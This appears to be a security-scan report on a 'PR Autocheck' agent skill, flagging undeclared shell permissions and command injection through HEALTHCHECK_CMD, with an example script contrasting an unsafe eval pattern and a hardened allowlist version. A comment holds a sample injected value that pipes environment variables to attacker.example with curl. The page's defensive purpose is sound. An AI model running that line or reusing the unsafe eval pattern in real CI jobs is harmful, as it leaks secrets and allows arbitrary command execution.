PR Autocheck

Security checks across malware telemetry and agentic risk

Overview

This skill is a disclosed PR-check automation script that reviews git diffs, optionally runs a configured health check, saves reports locally, and posts a limited summary to Discord when a webhook is provided.

Install only where CI environment variables are controlled by trusted maintainers. Do not let untrusted PRs set HEALTHCHECK_CMD or DISCORD_WEBHOOK_URL, and review what healthcheck command and webhook destination are configured before enabling automated post-submit use.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Least Privilege: Underdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
Findings (2)

Lp3

Severity: Medium
Category: MCP Least Privilege
Confidence: 89%
Finding: The skill exposes shell execution capabilities but does not declare any permissions or trust boundaries, which can cause it to run with more authority than users or operators expect. In this specific skill, the shell is used to process repository state, invoke health commands, and potentially send data to an external Discord webhook, so the missing declaration meaningfully increases the risk of unintended command execution and data exfiltration in automation contexts.

Context-Inappropriate Capability

Severity: Medium
Confidence: 98%
Finding: The script executes HEALTHCHECK_CMD via command substitution without constraining it to a fixed executable or validating its contents, so any party able to influence the environment can run arbitrary shell commands in the context of the skill. In a CI/post-submit automation context, that exceeds the stated purpose of performing PR checks and is especially dangerous because such jobs often have repository access, network egress, and webhook secrets available.
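The two findings above come down to the same mechanism: an environment variable is handed to the shell as a command, and another is used as a destination without any check on where it points. The snippet below is an added example written for this page; it is not the skill's own code, and the allowlist contents, the `discord.com` webhook prefix and the function names are assumptions. It shows the unsafe command-substitution pattern the finding describes next to a hardened version that accepts only a short safe character set, requires the first word to be an allowlisted executable, and runs it directly rather than re-parsing the string through `eval`.

```shell
#!/bin/sh
# Added example, not the skill's code. Allowlist and webhook prefix are assumptions.

# Unsafe pattern described in the finding: the whole variable is shell-parsed,
# so "make test; curl https://attacker.example/?d=$(env)" runs as written.
run_healthcheck_unsafe() {
  result=$(eval "$HEALTHCHECK_CMD")
  printf '%s\n' "$result"
}

# Assumed allowlist of executables a maintainer is willing to let CI run.
HEALTHCHECK_ALLOWLIST="make npm pytest"

# Returns 0 only if the value contains nothing but a conservative character set
# (no ; | & $ ` ( ) < > \ quotes or newlines) and its first word is allowlisted.
is_allowed_healthcheck() {
  case $1 in
    *[!A-Za-z0-9_./=:\ -]*) return 1 ;;   # any metacharacter rejects the value
  esac
  set -f                                   # no globbing while we word-split
  set -- $1
  set +f
  exe=${1-}
  for allowed in $HEALTHCHECK_ALLOWLIST; do
    [ "$exe" = "$allowed" ] && return 0
  done
  return 1
}

# Hardened replacement: validate, then execute the words directly (argv, not eval).
run_healthcheck() {
  if ! is_allowed_healthcheck "$1"; then
    printf 'refusing HEALTHCHECK_CMD: %s\n' "$1" >&2
    return 2
  fi
  set -f
  set -- $1
  set +f
  "$@"
}

# Pin the webhook to the expected Discord endpoint shape (assumed prefix) so a
# swapped environment variable cannot redirect the report to another host.
is_allowed_webhook() {
  case $1 in
    https://discord.com/api/webhooks/*) return 0 ;;
    *) return 1 ;;
  esac
}

# Stand-alone use: only runs when the variables are actually set.
if [ -n "${HEALTHCHECK_CMD-}" ]; then
  run_healthcheck "$HEALTHCHECK_CMD"
fi
if [ -n "${DISCORD_WEBHOOK_URL-}" ] && ! is_allowed_webhook "$DISCORD_WEBHOOK_URL"; then
  printf 'refusing DISCORD_WEBHOOK_URL: %s\n' "$DISCORD_WEBHOOK_URL" >&2
fi
```

The character allowlist deliberately excludes `$`, backticks, quotes and redirection, so command substitution inside the value is rejected before any word-splitting happens; the executable check then stops a value such as `rm -rf .` that uses only safe characters. Even with these checks, the guidance in the overview still applies: the variables must be set by trusted maintainers, not by the pull request under review.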

VirusTotal

63/63 vendors flagged this skill as clean.
